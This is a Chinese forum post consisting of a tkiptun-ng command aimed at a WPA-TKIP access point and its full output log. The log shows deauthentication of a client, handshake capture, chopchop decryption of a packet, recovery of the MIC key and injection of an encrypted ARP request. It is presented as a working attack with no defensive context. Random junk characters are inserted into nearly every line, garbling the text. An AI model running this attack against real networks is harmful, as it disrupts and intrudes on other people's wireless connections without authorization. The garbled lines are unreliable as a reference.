中尉
- 注册时间
- 2009-5-13
- 金币
- 584 个
- 威望
- 2 个
- 荣誉
- 0 个
尚未签到
|
Input: 输入/ j! l' B- e7 O! L- u
% D. L$ O0 h* @0 l0 l
% r, Q& P" p. [( {" E# p& w" `$ X
tkiptun-ng -h 00:0F:B5:AB:CB:9D -a 00:14:6C:7E:40:80 -m 80 -n 100 rausb0 $ K6 m5 K2 c/ R
+ D) p$ I+ Q$ S3 }7 P
Output: 输出
B3 ~3 X( s( G( a- N; A8 D! q; x
0 ~! ]7 @7 T G0 ^0 {7 N7 } The interface MAC (00:0E:2E:C5:81 3) doesn't match the specified MAC (-h).
+ V* L8 _/ W1 R ifconfig rausb0 hw ether 00:0F:B5:AB:CB:9D
4 ?4 ~. N7 e# Q, r; d Blub 2:38 E6 38 1C 24 15 1C CF 7 A* s* R9 d( I K7 f
Blub 1:17 DD 0D 69 1D C3 1F EE
, [9 g5 {3 a. u Blub 3:29 31 79 E7 E6 CF 8D 5E
- k2 ~" [5 N. Q) k/ ]+ v 15:06:48 Michael Test: Successful* Y3 c9 |( v1 f
15:06:48 Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9. i' ?$ q8 M# c" }0 M
15:06:48 Found specified AP1 Y$ F3 q/ Q I! _6 I3 T
15:06:48 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]
& _: s- W* ^ `5 }$ [ 15:06:54 Sending 4 directed DeAuth. STMAC: [00:0F:B5:AB:CB:9D] [ 0| 0 ACKs]
+ |1 I6 f, M: x2 S 15:06:56 WPA handshake: 00:14:6C:7E:40:80 captured
, H# J: H; H( Q" v0 _ 15:06:56 Waiting for an ARP packet coming from the Client...1 `% I8 v) Q! i' c. h; J
Saving chosen packet in replay_src-0305-150705.cap
8 `; ?, z* h) Q# i- Y$ O" y% o 15:07:05 Waiting for an ARP response packet coming from the AP...
2 j4 J" P- N" Y/ E. N7 T% B2 A Saving chosen packet in replay_src-0305-150705.cap
) n# Z$ c- V) J* ~ 15:07:05 Got the answer!
, A7 x% Y4 e+ E' a0 E 15:07:05 Waiting 10 seconds to let encrypted EAPOL frames pass without interfering.
/ b, B7 Q/ h- g$ i7 b6 x 1 ^( ?* @" j2 I3 P6 z" V$ K6 W J' p ?
15:07:25 Offset 99 ( 0% done) | xor = B3 | pt = D3 | 103 frames written in 84468ms
2 o$ E% Z4 t. \5 |! Q/ Z 15:08:32 Offset 98 ( 1% done) | xor = AE | pt = 80 | 64 frames written in 52489ms; Y5 g7 M( y* B
15:09:45 Offset 97 ( 3% done) | xor = DE | pt = C8 | 131 frames written in 107407ms
3 d& {1 s' r3 A3 M$ l) ^: F 15:11:05 Offset 96 ( 5% done) | xor = 5A | pt = 7A | 191 frames written in 156619ms
; b$ _" o7 H4 g: F6 o 15:12:07 Offset 95 ( 6% done) | xor = 27 | pt = 02 | 21 frames written in 17221ms. f0 D6 v k3 `/ d* R
15:13:11 Offset 94 ( 8% done) | xor = D8 | pt = AB | 41 frames written in 33625ms
' X5 ?4 Z! G. d( Q1 `) @ 15:14:12 Offset 93 (10% done) | xor = 94 | pt = 62 | 13 frames written in 10666ms3 t( j# H8 ~ h9 u: E' T) t
15:15:24 Offset 92 (11% done) | xor = DF | pt = 68 | 112 frames written in 91829ms5 M5 p/ p' f& _: a
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
5 Z/ B7 ~5 ~9 d8 A2 | 15:18:13 Offset 91 (13% done) | xor = A1 | pt = E1 | 477 frames written in 391139ms( i1 L* h) x' j- @! M3 z
15:19:32 Offset 90 (15% done) | xor = 5F | pt = B2 | 186 frames written in 152520ms2 v; G7 p, {( G2 |7 I4 D
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
$ k# y) \2 T1 o9 \4 T6 f 15:22:09 Offset 89 (16% done) | xor = 9C | pt = 77 | 360 frames written in 295200ms
5 C1 a/ T2 {8 m, ~9 U Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.& z+ W; P2 }$ y/ s' [: v
Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.4 j$ f) v2 `# B8 F! e/ b" H
15:26:10 Offset 88 (18% done) | xor = 0D | pt = 3E | 598 frames written in 490361ms$ w6 ^) d( @, k" I9 Q% b. \( ^
15:27:33 Offset 87 (20% done) | xor = 8C | pt = 00 | 230 frames written in 188603ms) h$ o# _8 Y0 ?/ c1 L
15:28:38 Offset 86 (21% done) | xor = 67 | pt = 00 | 47 frames written in 38537ms% J. i0 N5 v0 w( f3 z( b- z" c
15:29:53 Offset 85 (23% done) | xor = AD | pt = 00 | 146 frames written in 119720ms
6 O; s7 Q- {, M$ e) ~) _7 J 15:31:16 Offset 84 (25% done) | xor = A3 | pt = 00 | 220 frames written in 180401ms# r; Q# r( A! B
15:32:23 Offset 83 (26% done) | xor = 28 | pt = 00 | 75 frames written in 61499ms! ~* {# d1 J% ~6 K) c
15:33:38 Offset 82 (28% done) | xor = 7C | pt = 00 | 141 frames written in 115619ms. D5 V4 @; V. Z$ @
15:34:40 Offset 81 (30% done) | xor = 02 | pt = 00 | 19 frames written in 15584ms' t6 C* y. w+ P6 z4 d6 V8 \$ W
15:35:57 Offset 80 (31% done) | xor = C9 | pt = 00 | 171 frames written in 140221ms& P& j2 `+ L- k6 l
15:37:13 Offset 79 (33% done) | xor = 38 | pt = 00 | 148 frames written in 121364ms
$ e' B5 _+ ~% f% a 15:38:21 Offset 78 (35% done) | xor = 71 | pt = 00 | 84 frames written in 68872ms
* [+ J3 s2 }8 o4 G# ? Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.$ p6 Y* G6 h( ]( k& S% v$ u+ I4 Z' G& ^
15:40:55 Offset 77 (36% done) | xor = 8E | pt = 00 | 328 frames written in 268974ms
! ^! V/ r3 Y6 y& v0 n( u6 e Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.
2 @2 g0 Q: Y6 ?. A% _* o 15:43:31 Offset 76 (38% done) | xor = 38 | pt = 00 | 355 frames written in 291086ms
2 ?# k/ G8 E! ` 15:44:37 Offset 75 (40% done) | xor = 79 | pt = 00 | 61 frames written in 50021ms
7 W; @. |1 e" g Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.# @/ |. j% x0 i8 T5 T) _
15:47:05 Offset 74 (41% done) | xor = 59 | pt = 00 | 269 frames written in 220581ms. G! A4 v$ t7 R0 w7 Q
15:48:30 Offset 73 (43% done) | xor = 14 | pt = 00 | 249 frames written in 204178ms
' j" ?2 j, U/ E# I 15:49:49 Offset 72 (45% done) | xor = 9A | pt = 00 | 183 frames written in 150059ms
# [# N I4 n% Z& a7 ]/ \+ ] Looks like mic failure report was not detected. Waiting 60 seconds before trying again to avoid the AP shutting down.6 H+ G9 B+ B5 b, H! i. y
15:52:32 Offset 71 (46% done) | xor = 03 | pt = 00 | 420 frames written in 344400ms
' p0 @- L( }9 D8 g 15:53:57 Offset 70 (48% done) | xor = 0E | pt = 00 | 239 frames written in 195980ms
5 S7 q+ B* D' y Sleeping for 60 seconds.36 bytes still unknown" T" M) g- p% i( p4 M1 t: c
ARP Reply! c# g. B; i- ?- m+ ^" Y" x% N
Checking 192.168.x.y) n* h0 s8 l% p( Q& w1 _/ A6 r
15:54:11 Reversed MIC Key (FromDS): C3:95:10:04:8F:8D:6C:66
! p5 y |; A# }
0 {' f, j0 M+ N0 c Saving plaintext in replay_dec-0305-155411.cap5 m; @7 j) A7 R1 D4 k. {# e' d, w
Saving keystream in replay_dec-0305-155411.xor. o6 k2 o: R) ^' D
15:54:11
. W0 Y/ I7 B. d* Q2 ^$ D1 n Completed in 2816s (0.02 bytes/s)6 }1 E: W$ E. _ d
: f2 U& ^: U; J) h/ f" [+ I
15:54:11 AP MAC: 00:40:F4:77:F0:9B IP: 192.168.21.42
! Q d2 Q9 I5 R! n8 Z6 ? 15:54:11 Client MAC: 00:0F:B5:AB:CB:9D IP: 192.168.21.112
4 W7 {7 |! L7 q& o1 b- F 15:54:11 Sent encrypted tkip ARP request to the client.
. b7 l; t+ ?3 y7 g* w8 r6 ` 15:54:11 Wait for the mic countermeasure timeout of 60 seconds. |
|
[复制链接]
IP卡
狗仔卡
发表于 2011-5-16 06:41
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡